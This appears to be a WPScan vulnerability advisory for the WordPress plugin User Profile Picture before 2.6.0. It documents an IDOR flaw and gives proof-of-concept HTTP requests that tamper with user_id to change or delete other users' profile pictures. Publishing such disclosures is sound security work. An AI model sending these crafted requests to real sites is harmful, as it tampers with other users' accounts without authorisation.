WordPress Plugin Vulnerabilities
User Profile Picture < 2.6.0 - Arbitrary User Picture Change/Deletion via IDOR
Description
The plugin was affected by an IDOR issue, allowing users with the upload_image capability (by default author and above) to change and delete the profile pictures of other users (including those with higher roles).
Proof of Concept
Use a proxy such as Burp Suite to capture the request made when change your own profile picture, then tamper with the user_id parameter to change someone's else picture POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 89 Connection: close Cookie: [author+] action=metronet_add_thumbnail&post_id=1105&user_id=1&thumbnail_id=544&_wpnonce=b0db44185f Same thing can be done to remove the profile picture of any user: POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 75 Connection: close Cookie: [author+] action=metronet_remove_thumbnail&post_id=1105&user_id=1&_wpnonce=b0db44185f
Affects Plugins
Fixed in 2.6.0 References
CVE
Classification
Type
IDOR
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-06-28 (about 2 years ago)
Added
2021-06-28 (about 2 years ago)
Last Updated
2022-01-02 (about 2 years ago)
WPScan 